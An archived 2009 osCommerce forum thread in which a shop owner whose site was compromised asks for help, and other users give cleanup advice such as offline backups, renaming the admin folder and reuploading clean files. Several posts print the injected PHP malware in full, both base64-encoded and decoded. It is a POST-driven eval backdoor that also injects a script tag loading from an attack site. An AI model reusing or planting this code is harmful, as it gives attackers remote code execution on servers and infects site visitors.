oscomm.1986 Posted October 26, 2009 Posted October 26, 2009 Hi Our website got hacked or had a virus attack and the code is modified and there are pieces of 'eval codes' in various files of the website pages. After editing and correcting various pages, the site is running now but there still are pages with the eval code. This is the actual code: <?php eval(base64_decode('aWYoIWlzc2V0KCRuZnYxKSl7ZnVuY3Rpb24gbmZ2KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM0J6WjNSbFkyZzNNaTVqYjIwdlkyRnNaVzVrWVhKMFpYTjBMM0J5YjJacGJHVXpMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbmZ2MigkYSwkYiwkYywkZCl7Z2xvYmFsICRuZnYxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRuZnYxKSljYWxsX3VzZXJfZnVuYygkbmZ2MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSduZnYnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbmZ2Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG5mdmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ25mdjInKSkhPSduZnYyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?> Does anybody know anything about this eval code? Will it do anything harmful even after deleting it? Does anyone have any idea if a person did this or is it just some virus? We changed the ftp,ssh and database passwords. Any suggestions on what else we could do?
burtonsnow8 Posted October 26, 2009 Posted October 26, 2009 Hi Our website got hacked or had a virus attack and the code is modified and there are pieces of 'eval codes' in various files of the website pages. After editing and correcting various pages, the site is running now but there still are pages with the eval code. This is the actual code: <?php eval(base64_decode('aWYoIWlzc2V0KCRuZnYxKSl7ZnVuY3Rpb24gbmZ2KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM0J6WjNSbFkyZzNNaTVqYjIwdlkyRnNaVzVrWVhKMFpYTjBMM0J5YjJacGJHVXpMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbmZ2MigkYSwkYiwkYywkZCl7Z2xvYmFsICRuZnYxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRuZnYxKSljYWxsX3VzZXJfZnVuYygkbmZ2MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSduZnYnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbmZ2Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG5mdmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ25mdjInKSkhPSduZnYyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?> Does anybody know anything about this eval code? Will it do anything harmful even after deleting it? Does anyone have any idea if a person did this or is it just some virus? We changed the ftp,ssh and database passwords. Any suggestions on what else we could do? You should remove all infected code. there are mulitple posts here about this hack, please search the forums and see what other people have done. take a look here: http://forums.oscomm...cure-your-site/ http://www.oscommerce.com/forums/topic/345957-evalbase64-decode-hack/
oscomm.1986 Posted October 26, 2009 Author Posted October 26, 2009 Thanks for your reply. I dint know these many were effected by this code. But I have a different problem here. We backup the site onto the same system and when we tried to replace the effected code with the clean backup, its all corrupted. Even the discs we burned are corrupted!! This might not have anything to do with the hacking but now we lost all our backup!! So I had to manually check every php file to remove that code. Is there any better idea? And Ive read some posts which say, it keeps coming back. How long does it take to come back? And I've read in some posts to rename the 'admin' folder. But if I do that, wouldnt I have to change the name in every path which refers to admin?
Xpajun Posted October 26, 2009 Posted October 26, 2009 If you read through all the posts on the subject you'll find most, if not all of your answers. You should always keep a master copy of your store on your computer (one that has never seen the internet) then use this to back up your store. There are some major things to do to prevent infection: Remove your osCommerce file manager file Remmove the define languages file Rename the admin directory Move your admin directory to another domain but don't ignore the other security advice that is given My store is currently running Phoenix 1.0.3.0 I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 ) I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary
burtonsnow8 Posted October 26, 2009 Posted October 26, 2009 Thanks for your reply. I dint know these many were effected by this code. But I have a different problem here. We backup the site onto the same system and when we tried to replace the effected code with the clean backup, its all corrupted. Even the discs we burned are corrupted!! This might not have anything to do with the hacking but now we lost all our backup!! So I had to manually check every php file to remove that code. Is there any better idea? And Ive read some posts which say, it keeps coming back. How long does it take to come back? And I've read in some posts to rename the 'admin' folder. But if I do that, wouldnt I have to change the name in every path which refers to admin? I try to keep back ups of my site on a computer that either does not have access to the internet or i'm 100%sure is safe. I also do a tape backup of my website on a daily basis. If the files that are creating the eval code are still on your website, then regardless of if you place a clean copy or not the code will be present. first things, find out which directory the infected files are stored in. use this to find out where: http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx Once you have found infected files, delete them. Please read through those links I have provided there is a lot of information available that will answer many of your questions.
oscomm.1986 Posted October 27, 2009 Author Posted October 27, 2009 I try to keep back ups of my site on a computer that either does not have access to the internet or i'm 100%sure is safe. I also do a tape backup of my website on a daily basis. If the files that are creating the eval code are still on your website, then regardless of if you place a clean copy or not the code will be present. first things, find out which directory the infected files are stored in. use this to find out where: http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx Once you have found infected files, delete them. Please read through those links I have provided there is a lot of information available that will answer many of your questions. Hi Thanks a lot for the reply. We will backup our website and save it in multiple systems from now on.I followed the link you suggested and decoded the eval code and the output is: if(!isset($nfv1)){function nfv($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3BzZ3RlY2g3Mi5jb20vY2FsZW5kYXJ0ZXN0L3Byb2ZpbGUzLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function nfv2($a,$b,$c,$d){global $nfv1;$s=array();if(function_exists($nfv1))call_user_func($nfv1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='nfv')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('nfv');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$nfvl=(($a=@set_error_handler('nfv2'))!='nfv2')?$a:0;eval(base64_decode($_POST['e'])); Does this mean anything? Will I be able to find where the infected file is, from this decoded code? Can anybody help me understand what this code means or does?
oscomm.1986 Posted October 27, 2009 Author Posted October 27, 2009 Oh and this part had to be decoded again: $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3BzZ3RlY2g3Mi5jb20vY2FsZW5kYXJ0ZXN0L3Byb2ZpbGUzLnBocCA+PC9zY3JpcHQ+'),'',$s) and the decoded code is: <script src=http://psgtech72.com/calendartest/profile3.php ></script> Does that mean this is the website which is responsible for the hackk code? I tried to visit the site and got a warning "Reported attack site"!! Any clues anybody?
burtonsnow8 Posted October 27, 2009 Posted October 27, 2009 Oh and this part had to be decoded again: and the decoded code is: <script src=http://psgtech72.com/calendartest/profile3.php ></script> Does that mean this is the website which is responsible for the hackk code? I tried to visit the site and got a warning "Reported attack site"!! Any clues anybody? That is just the site your users were being redirected to. It will be very hard to find who was doing it just by that. I can't tell where those files are being stored as its calling functions from some script. Seems best to remove everything from your server and re-upload a set of clean files.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.